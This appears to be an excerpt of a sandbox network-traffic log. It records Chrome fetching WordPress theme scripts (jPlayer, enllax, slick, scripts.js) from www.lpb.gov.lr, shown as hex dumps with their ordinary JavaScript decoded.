                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 64 5b 65 5d 29 29 7d 65 6c 73 65 20 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 63 2c 62 29 7b 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 72 61 6d 22 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 63 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 76 61 6c 75 65 22 2c 62 29 3b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 62 6a 65 63 74 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 74 68 69 73 2e 69 6e 74 65 72 6e 61 6c 2e 66 6c 61 73 68 2e 69 64 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e
                                                                                                                        Data Ascii: ocument.createElement(d[e]))}else e=function(a,c,b){var d=document.createElement("param");d.setAttribute("name",c);d.setAttribute("value",b);a.appendChild(d)},c=document.createElement("object"),c.setAttribute("id",this.internal.flash.id),c.setAttribute("n
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 61 79 65 72 2e 65 76 65 6e 74 2e 72 65 70 65 61 74 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 28 61 29 3b 65 6c 73 65 20 69 66 28 74 68 69 73 2e 66 6c 61 73 68 2e 67 61 74 65 29 7b 69 66 28 74 68 69 73 2e 73 74 61 74 75 73 2e 73 72 63 53 65 74 29 7b 76 61 72 20 64 3d 74 68 69 73 2e 73 74 61 74 75 73 2e 63 75 72 72 65 6e 74 54 69 6d 65 2c 65 3d 74 68 69 73 2e 73 74 61 74 75 73 2e 70 61 75 73 65 64 3b 74 68 69 73 2e 73 65 74 4d 65 64 69 61 28 74 68 69 73 2e 73 74 61 74 75 73 2e 6d 65 64 69 61 29 3b 74 68 69 73 2e 76 6f 6c 75 6d 65 57 6f 72 6b 65 72 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 6f 6c 75 6d 65 29 3b 30 3c 64 26 26 28 65 3f 74 68 69 73 2e 70 61 75 73 65 28 64 29 3a 74 68 69 73 2e 70 6c 61 79 28 64 29 29 7d 74 68 69 73 2e 5f 74 72 69 67 67 65
                                                                                                                        Data Ascii: ayer.event.repeat),this._trigger(a);else if(this.flash.gate){if(this.status.srcSet){var d=this.status.currentTime,e=this.status.paused;this.setMedia(this.status.media);this.volumeWorker(this.options.volume);0<d&&(e?this.pause(d):this.play(d))}this._trigge
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 69 73 2e 66 6c 61 73 68 2e 75 73 65 64 26 26 74 68 69 73 2e 5f 66 6c 61 73 68 5f 76 6f 6c 75 6d 65 28 61 29 3b 74 68 69 73 2e 68 74 6d 6c 2e 76 69 64 65 6f 2e 67 61 74 65 7c 7c 74 68 69 73 2e 68 74 6d 6c 2e 61 75 64 69 6f 2e 67 61 74 65 7c 7c 0a 28 74 68 69 73 2e 5f 75 70 64 61 74 65 56 6f 6c 75 6d 65 28 61 29 2c 74 68 69 73 2e 5f 74 72 69 67 67 65 72 28 62 2e 6a 50 6c 61 79 65 72 2e 65 76 65 6e 74 2e 76 6f 6c 75 6d 65 63 68 61 6e 67 65 29 29 7d 2c 76 6f 6c 75 6d 65 42 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 68 69 73 2e 63 73 73 2e 6a 71 2e 76 6f 6c 75 6d 65 42 61 72 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 63 3d 62 28 61 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 64 3d 63 2e 6f 66 66 73 65 74 28 29 2c 65 3d 61 2e 70 61 67 65 58 2d 64
                                                                                                                        Data Ascii: is.flash.used&&this._flash_volume(a);this.html.video.gate||this.html.audio.gate||(this._updateVolume(a),this._trigger(b.jPlayer.event.volumechange))},volumeBar:function(a){if(this.css.jq.volumeBar.length){var c=b(a.currentTarget),d=c.offset(),e=a.pageX-d
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 7a 65 2e 77 69 64 74 68 2c 74 68 69 73 2e 73 74 61 74 75 73 2e 68 65 69 67 68 74 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 7a 65 2e 68 65 69 67 68 74 2c 74 68 69 73 2e 73 74 61 74 75 73 2e 63 73 73 43 6c 61 73 73 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 73 69 7a 65 2e 63 73 73 43 6c 61 73 73 29 3b 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 63 73 73 28 7b 77 69 64 74 68 3a 74 68 69 73 2e 73 74 61 74 75 73 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 74 68 69 73 2e 73 74 61 74 75 73 2e 68 65 69 67 68 74 7d 29 7d 2c 5f 61 64 64 55 69 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 61 6e 63 65 73 74 6f 72 4a 71 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 61 6e 63 65 73 74 6f 72 4a 71 2e 61 64 64
                                                                                                                        Data Ascii: =this.options.size.width,this.status.height=this.options.size.height,this.status.cssClass=this.options.size.cssClass);this.element.css({width:this.status.width,height:this.status.height})},_addUiClass:function(){this.ancestorJq.length&&this.ancestorJq.add
                                                                                                                        2025-01-10 13:54:51 UTC4754INData Raw: 6d 75 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 74 68 69 73 2e 5f 67 65 74 4d 6f 76 69 65 28 29 2e 66 6c 5f 6d 75 74 65 28 61 29 7d 63 61 74 63 68 28 62 29 7b 74 68 69 73 2e 5f 66 6c 61 73 68 45 72 72 6f 72 28 62 29 7d 7d 2c 5f 67 65 74 4d 6f 76 69 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 5b 74 68 69 73 2e 69 6e 74 65 72 6e 61 6c 2e 66 6c 61 73 68 2e 69 64 5d 7d 2c 0a 5f 67 65 74 46 6c 61 73 68 50 6c 75 67 69 6e 56 65 72 73 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 30 2c 62 3b 69 66 28 77 69 6e 64 6f 77 2e 41 63 74 69 76 65 58 4f 62 6a 65 63 74 29 74 72 79 7b 69 66 28 62 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 53 68 6f 63 6b 77 61 76 65 46 6c 61 73 68 2e 53
                                                                                                                        Data Ascii: mute:function(a){try{this._getMovie().fl_mute(a)}catch(b){this._flashError(b)}},_getMovie:function(){return document[this.internal.flash.id]},_getFlashPluginVersion:function(){var a=0,b;if(window.ActiveXObject)try{if(b=new ActiveXObject("ShockwaveFlash.S


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        70192.168.2.74987669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC499OUTGET /wp-content/themes/betheme/js/plugins/enllax.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:51 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "604-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 1540
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:51 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:51 UTC1540INData Raw: 2f 2a 2a 0a 20 2a 20 50 61 72 61 6c 6c 61 78 0a 20 2a 20 65 6e 6c 6c 61 78 2e 6a 73 0a 20 2a 20 31 2e 31 2e 30 20 7c 20 63 6f 70 79 72 69 67 68 74 20 32 30 31 35 2c 20 4d 4d 4b 20 4a 6f 6e 79 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 6d 6b 6a 6f 6e 79 2f 65 6e 6c 6c 61 78 2e 6a 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 66 6e 2e 65 6e 6c 6c 61 78 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 61 3d 74 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 2c 6e 3d 74 28 64 6f 63 75 6d 65 6e 74 29 2e 68 65 69 67 68 74 28 29 2c 6f 3d 74 2e 65 78 74 65 6e 64 28 7b 72 61 74 69 6f 3a 30 2c 74 79 70 65 3a 22 62 61 63 6b 67 72 6f 75 6e 64 22 2c 64 69 72 65 63 74 69 6f 6e 3a 22
                                                                                                                        Data Ascii: /** * Parallax * enllax.js * 1.1.0 | copyright 2015, MMK Jony | https://github.com/mmkjony/enllax.js */!function(t){"use strict";t.fn.enllax=function(r){var a=t(window).height(),n=t(document).height(),o=t.extend({ratio:0,type:"background",direction:"


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        71192.168.2.74987769.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC501OUTGET /wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:51 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "fd1-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 4049
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:51 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:51 UTC4049INData Raw: 2f 2a 2a 0a 20 2a 20 50 61 72 61 6c 6c 61 78 0a 20 2a 0a 20 2a 20 54 72 61 6e 73 6c 61 74 65 33 64 0a 20 2a 20 31 2e 30 20 7c 20 4d 75 66 66 69 6e 20 47 72 6f 75 70 0a 20 2a 2f 0a 0a 76 61 72 20 6d 66 6e 53 65 74 75 70 20 3d 20 7b 0a 20 20 74 72 61 6e 73 6c 61 74 65 3a 20 6e 75 6c 6c 0a 7d 3b 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 0a 20 20 2f 2a 20 67 6c 6f 62 61 6c 73 20 6a 51 75 65 72 79 20 2a 2f 0a 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 6d 66 6e 53 65 74 75 70 0a 20 20 20 2a 2f 0a 0a 20 20 2f 2f 20 68 61 73 33 64 0a 0a 20 20 76 61 72 20 68 61 73 33 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 69 66 20 28 21 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c
                                                                                                                        Data Ascii: /** * Parallax * * Translate3d * 1.0 | Muffin Group */var mfnSetup = { translate: null};(function($) { /* globals jQuery */ "use strict"; /** * mfnSetup */ // has3d var has3d = function() { if (!window.getComputedStyl


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        72192.168.2.74987969.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC498OUTGET /wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:51 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "a944-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 43332
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:51 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:51 UTC7823INData Raw: 2f 2a 2a 0a 20 2a 20 53 6c 69 64 65 72 0a 20 2a 20 53 6c 69 63 6b 2e 6a 73 0a 20 2a 20 31 2e 39 2e 30 20 7c 20 4b 65 6e 20 57 68 65 65 6c 65 72 20 7c 20 68 74 74 70 3a 2f 2f 6b 65 6e 77 68 65 65 6c 65 72 2e 67 69 74 68 75 62 2e 69 6f 20 7c 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 69 29 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 69 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 69 28 6a 51 75 65 72 79 29
                                                                                                                        Data Ascii: /** * Slider * Slick.js * 1.9.0 | Ken Wheeler | http://kenwheeler.github.io | MIT license */!function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 72 6f 6c 6c 3d 31 29 2c 69 28 22 69 6d 67 5b 64 61 74 61 2d 6c 61 7a 79 5d 22 2c 65 2e 24 73 6c 69 64 65 72 29 2e 6e 6f 74 28 22 5b 73 72 63 5d 22 29 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 6c 6f 61 64 69 6e 67 22 29 2c 65 2e 73 65 74 75 70 49 6e 66 69 6e 69 74 65 28 29 2c 65 2e 62 75 69 6c 64 41 72 72 6f 77 73 28 29 2c 65 2e 62 75 69 6c 64 44 6f 74 73 28 29 2c 65 2e 75 70 64 61 74 65 44 6f 74 73 28 29 2c 65 2e 73 65 74 53 6c 69 64 65 43 6c 61 73 73 65 73 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 3f 65 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 3a 30 29 2c 21 30 3d 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 64 72 61 67 67 61 62 6c 65 26 26 65 2e 24 6c 69 73 74 2e 61 64 64 43 6c 61 73 73 28 22 64 72 61
                                                                                                                        Data Ascii: roll=1),i("img[data-lazy]",e.$slider).not("[src]").addClass("slick-loading"),e.setupInfinite(),e.buildArrows(),e.buildDots(),e.updateDots(),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),!0===e.options.draggable&&e.$list.addClass("dra
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 64 65 73 54 6f 53 63 72 6f 6c 6c 29 3b 72 65 74 75 72 6e 20 6f 2d 31 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 4c 65 66 74 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 2c 74 2c 6f 2c 73 2c 6e 3d 74 68 69 73 2c 72 3d 30 3b 72 65 74 75 72 6e 20 6e 2e 73 6c 69 64 65 4f 66 66 73 65 74 3d 30 2c 74 3d 6e 2e 24 73 6c 69 64 65 73 2e 66 69 72 73 74 28 29 2e 6f 75 74 65 72 48 65 69 67 68 74 28 21 30 29 2c 21 30 3d 3d 3d 6e 2e 6f 70 74 69 6f 6e 73 2e 69 6e 66 69 6e 69 74 65 3f 28 6e 2e 73 6c 69 64 65 43 6f 75 6e 74 3e 6e 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 26 26 28 6e 2e 73 6c 69 64 65 4f 66 66 73 65 74 3d 6e 2e 73 6c 69 64 65 57 69 64 74 68 2a 6e 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2a 2d 31 2c
                                                                                                                        Data Ascii: desToScroll);return o-1},e.prototype.getLeft=function(i){var e,t,o,s,n=this,r=0;return n.slideOffset=0,t=n.$slides.first().outerHeight(!0),!0===n.options.infinite?(n.slideCount>n.options.slidesToShow&&(n.slideOffset=n.slideWidth*n.options.slidesToShow*-1,
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 7d 2c 72 2e 73 72 63 3d 74 7d 29 7d 69 66 28 21 30 3d 3d 3d 73 2e 6f 70 74 69 6f 6e 73 2e 63 65 6e 74 65 72 4d 6f 64 65 3f 21 30 3d 3d 3d 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 66 69 6e 69 74 65 3f 6f 3d 28 74 3d 73 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 2b 28 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2f 32 2b 31 29 29 2b 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2b 32 3a 28 74 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 73 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 2d 28 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2f 32 2b 31 29 29 2c 6f 3d 73 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 68 6f 77 2f 32 2b 31 2b 32 2b 73 2e 63 75 72 72 65 6e 74 53 6c 69 64 65 29 3a 28 74 3d 73 2e 6f 70 74 69
                                                                                                                        Data Ascii: },r.src=t})}if(!0===s.options.centerMode?!0===s.options.infinite?o=(t=s.currentSlide+(s.options.slidesToShow/2+1))+s.options.slidesToShow+2:(t=Math.max(0,s.currentSlide-(s.options.slidesToShow/2+1)),o=s.options.slidesToShow/2+1+2+s.currentSlide):(t=s.opti
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 70 65 2e 73 65 74 50 72 6f 70 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 69 3d 74 68 69 73 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 3b 69 2e 70 6f 73 69 74 69 6f 6e 50 72 6f 70 3d 21 30 3d 3d 3d 69 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 3f 22 74 6f 70 22 3a 22 6c 65 66 74 22 2c 22 74 6f 70 22 3d 3d 3d 69 2e 70 6f 73 69 74 69 6f 6e 50 72 6f 70 3f 69 2e 24 73 6c 69 64 65 72 2e 61 64 64 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 76 65 72 74 69 63 61 6c 22 29 3a 69 2e 24 73 6c 69 64 65 72 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 73 6c 69 63 6b 2d 76 65 72 74 69 63 61 6c 22 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 2e 57 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 4d 6f 7a 54 72 61 6e
                                                                                                                        Data Ascii: pe.setProps=function(){var i=this,e=document.body.style;i.positionProp=!0===i.options.vertical?"top":"left","top"===i.positionProp?i.$slider.addClass("slick-vertical"):i.$slider.removeClass("slick-vertical"),void 0===e.WebkitTransition&&void 0===e.MozTran
                                                                                                                        2025-01-10 13:54:51 UTC3509INData Raw: 74 6f 75 63 68 4f 62 6a 65 63 74 2e 63 75 72 59 2d 6c 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 74 61 72 74 59 2c 32 29 29 29 2c 21 6c 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 53 77 69 70 69 6e 67 26 26 21 6c 2e 73 77 69 70 69 6e 67 26 26 72 3e 34 3f 28 6c 2e 73 63 72 6f 6c 6c 69 6e 67 3d 21 30 2c 21 31 29 3a 28 21 30 3d 3d 3d 6c 2e 6f 70 74 69 6f 6e 73 2e 76 65 72 74 69 63 61 6c 53 77 69 70 69 6e 67 26 26 28 6c 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 77 69 70 65 4c 65 6e 67 74 68 3d 72 29 2c 74 3d 6c 2e 73 77 69 70 65 44 69 72 65 63 74 69 6f 6e 28 29 2c 76 6f 69 64 20 30 21 3d 3d 69 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 26 26 6c 2e 74 6f 75 63 68 4f 62 6a 65 63 74 2e 73 77 69 70 65 4c 65 6e 67 74 68 3e 34 26 26 28 6c 2e 73 77 69 70 69 6e
                                                                                                                        Data Ascii: touchObject.curY-l.touchObject.startY,2))),!l.options.verticalSwiping&&!l.swiping&&r>4?(l.scrolling=!0,!1):(!0===l.options.verticalSwiping&&(l.touchObject.swipeLength=r),t=l.swipeDirection(),void 0!==i.originalEvent&&l.touchObject.swipeLength>4&&(l.swipin


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        73192.168.2.74988069.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC488OUTGET /wp-content/themes/betheme/js/scripts.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:51 UTC371INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "20ac7-60e9383bf1b3e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 133831
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:51 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:51 UTC7821INData Raw: 2f 2a 20 67 6c 6f 62 61 6c 73 20 6a 51 75 65 72 79 2c 20 6d 66 6e 20 2a 2f 0a 2f 2a 20 6a 73 68 69 6e 74 20 65 73 76 65 72 73 69 6f 6e 3a 20 36 20 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 71 75 65 72 79 20 6c 6f 6f 70 20 6d 61 73 6f 6e 72 79 20 2d 20 70 72 65 76 65 6e 74 73 20 65 72 72 6f 72 20 77 69 74 68 20 69 6e 69 74 20 69 6e 20 69 66 72 61 6d 65 0a 20 2a 2f 0a 0a 66 75 6e 63 74 69 6f 6e 20 71 75 65 72 79 4c 6f 6f 70 4d 61 73 6f 6e 72 79 28 29 20 7b 0a 20 20 6a 51 75 65 72 79 28 27 2e 6d 66 6e 2d 71 75 65 72 79 2d 6c 6f 6f 70 2d 6d 61 73 6f 6e 72 79 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 6c 65 74 20 24 6d 61 73 6f 6e 72 79 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 3b 0a 0a 20 20 20 20 24 6d 61 73 6f 6e 72 79 2e 69 6d
                                                                                                                        Data Ascii: /* globals jQuery, mfn *//* jshint esversion: 6 *//** * query loop masonry - prevents error with init in iframe */function queryLoopMasonry() { jQuery('.mfn-query-loop-masonry').each(function() { let $masonry = jQuery(this); $masonry.im
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 68 65 61 64 65 72 46 6f 6f 74 65 72 48 20 3d 20 68 65 61 64 65 72 57 72 61 70 70 65 72 48 20 2b 20 66 6f 6f 74 65 72 48 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 64 6f 63 75 6d 65 6e 74 48 20 3d 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 68 65 69 67 68 74 28 29 20 2d 20 61 64 6d 69 6e 42 61 72 48 28 29 3b 0a 0a 20 20 20 20 20 20 69 66 20 28 20 28 20 64 6f 63 75 6d 65 6e 74 48 20 3c 3d 20 24 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 20 29 20 26 26 20 28 20 68 65 61 64 65 72 46 6f 6f 74 65 72 48 20 3c 3d 20 24 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 27 23 46 6f 6f 74 65 72 27 29 2e 61 64 64 43 6c 61 73 73 28 27 69 73 2d 73 74 69 63 6b 79 27 29 3b 0a 20 20
                                                                                                                        Data Ascii: ; var headerFooterH = headerWrapperH + footerH; var documentH = $(document).height() - adminBarH(); if ( ( documentH <= $(window).height() ) && ( headerFooterH <= $(window).height() ) ) { $('#Footer').addClass('is-sticky');
